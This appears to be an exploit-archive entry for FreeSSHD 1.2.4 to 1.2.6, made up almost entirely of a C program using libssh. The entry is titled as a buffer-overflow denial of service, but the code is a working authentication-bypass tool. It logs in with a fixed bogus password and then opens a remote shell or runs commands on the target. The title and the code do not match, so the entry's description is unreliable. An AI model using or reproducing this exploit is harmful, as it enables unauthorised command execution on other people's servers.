FreeSSHD 1.2.4~1.2.6 Remote Buffer Overflow DoS

Risk: High
Local: No
Remote: Yes
CWE: CWE-119

#include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <termios.h> #include <sys/select.h> #include <sys/time.h> #include <pty.h> #include <sys/ioctl.h> #include <signal.h> #include <errno.h> #include <libssh/libssh.h> #define MAXCMD 10 char *host; char *user; char *cmds[MAXCMD]; struct termios terminal; static void add_cmd(char *cmd){ int n; for(n=0;cmds[n] && (n<MAXCMD);n++); if(n==MAXCMD) return; cmds[n]=strdup(cmd); } static void usage(){ fprintf(stderr,"Usage : freesshpwn [login () ]hostname\n" "login must exist on SSH server\n"); exit(0); } static int opts(int argc, char **argv){ int i=1; if(i < argc) host=argv[i++]; while(i < argc) add_cmd(argv[i++]); if(host==NULL) usage(); return 0; } static void do_cleanup(int i) { /* unused variable */ (void) i; tcsetattr(0,TCSANOW,&terminal); } static void do_exit(int i) { /* unused variable */ (void) i; do_cleanup(0); exit(0); } ssh_channel chan; int signal_delayed=0; static void sigwindowchanged(int i){ (void) i; signal_delayed=1; } static void setsignal(void){ signal(SIGWINCH, sigwindowchanged); signal_delayed=0; } static void sizechanged(void){ struct winsize win = { 0, 0, 0, 0 }; ioctl(1, TIOCGWINSZ, &win); channel_change_pty_size(chan,win.ws_col, win.ws_row); // printf("Changed pty size\n"); setsignal(); } static void select_loop(ssh_session session,ssh_channel channel){ fd_set fds; struct timeval timeout; char buffer[4096]; /* channels will be set to the channels to poll. * outchannels will contain the result of the poll */ ssh_channel channels[2], outchannels[2]; int lus; int eof=0; int maxfd; int ret; while(channel){ do{ FD_ZERO(&fds); if(!eof) FD_SET(0,&fds); timeout.tv_sec=30; timeout.tv_usec=0; FD_SET(ssh_get_fd(session),&fds); maxfd=ssh_get_fd(session)+1; channels[0]=channel; // set the first channel we want to read from channels[1]=NULL; ret=ssh_select(channels,outchannels,maxfd,&fds,&timeout); if(signal_delayed) sizechanged(); if(ret==EINTR) continue; if(FD_ISSET(0,&fds)){ lus=read(0,buffer,sizeof(buffer)); if(lus) channel_write(channel,buffer,lus); else { eof=1; channel_send_eof(channel); } } if(channel && channel_is_closed(channel)){ ssh_log(session,SSH_LOG_RARE,"exit-status : %d\n",channel_get_exit_status(channel)); channel_free(channel); channel=NULL; channels[0]=NULL; } if(outchannels[0]){ while(channel && channel_is_open(channel) && channel_poll(channel,0)){ lus=channel_read(channel,buffer,sizeof(buffer),0); if(lus==-1){ fprintf(stderr, "Error reading channel: %s\n", ssh_get_error(session)); return; } if(lus==0){ ssh_log(session,SSH_LOG_RARE,"EOF received\n"); ssh_log(session,SSH_LOG_RARE,"exit-status : %d\n",channel_get_exit_status(channel)); channel_free(channel); channel=channels[0]=NULL; } else write(1,buffer,lus); } while(channel && channel_is_open(channel) && channel_poll(channel,1)){ /* stderr */ lus=channel_read(channel,buffer,sizeof(buffer),1); if(lus==-1){ fprintf(stderr, "Error reading channel: %s\n", ssh_get_error(session)); return; } if(lus==0){ ssh_log(session,SSH_LOG_RARE,"EOF received\n"); ssh_log(session,SSH_LOG_RARE,"exit-status : %d\n",channel_get_exit_status(channel)); channel_free(channel); channel=channels[0]=NULL; } else write(2,buffer,lus); } } if(channel && channel_is_closed(channel)){ channel_free(channel); channel=NULL; } } while (ret==EINTR || ret==SSH_EINTR); } } static void shell(ssh_session session){ ssh_channel channel; struct termios terminal_local; int interactive=isatty(0); channel = channel_new(session); if(interactive){ tcgetattr(0,&terminal_local); memcpy(&terminal,&terminal_local,sizeof(struct termios)); } if(channel_open_session(channel)){ printf("error opening channel : %s\n",ssh_get_error(session)); return; } chan=channel; if(interactive){ channel_request_pty(channel); sizechanged(); } if(channel_request_shell(channel)){ printf("Requesting shell : %s\n",ssh_get_error(session)); return; } if(interactive){ cfmakeraw(&terminal_local); tcsetattr(0,TCSANOW,&terminal_local); setsignal(); } signal(SIGTERM,do_cleanup); select_loop(session,channel); if(interactive) do_cleanup(0); } static void batch_shell(ssh_session session){ ssh_channel channel; char buffer[1024]; int i,s=0; for(i=0;i<MAXCMD && cmds[i];++i) s+=snprintf(buffer+s,sizeof(buffer)-s,"%s ",cmds[i]); channel=channel_new(session); channel_open_session(channel); if(channel_request_exec(channel,buffer)){ printf("error executing \"%s\" : %s\n",buffer,ssh_get_error(session)); return; } select_loop(session,channel); } static int client(ssh_session session){ if (user) ssh_options_set(session, SSH_OPTIONS_USER, user); ssh_options_set(session, SSH_OPTIONS_HOST ,host); if(ssh_connect(session)){ fprintf(stderr,"Connection failed : %s\n",ssh_get_error(session)); return -1; } ssh_userauth_none(session, NULL); ssh_userauth_password(session, NULL, "youshallnotpwn"); system("clear"); if(!cmds[0]) shell(session); else batch_shell(session); return 0; } int main(int argc, char **argv){ ssh_session session; session = ssh_new(); if(ssh_options_getopt(session, &argc, argv)) { fprintf(stderr, "error parsing command line :%s\n", ssh_get_error(session)); usage(); } opts(argc,argv); signal(SIGTERM, do_exit); client(session); ssh_disconnect(session); ssh_free(session); return 0; }


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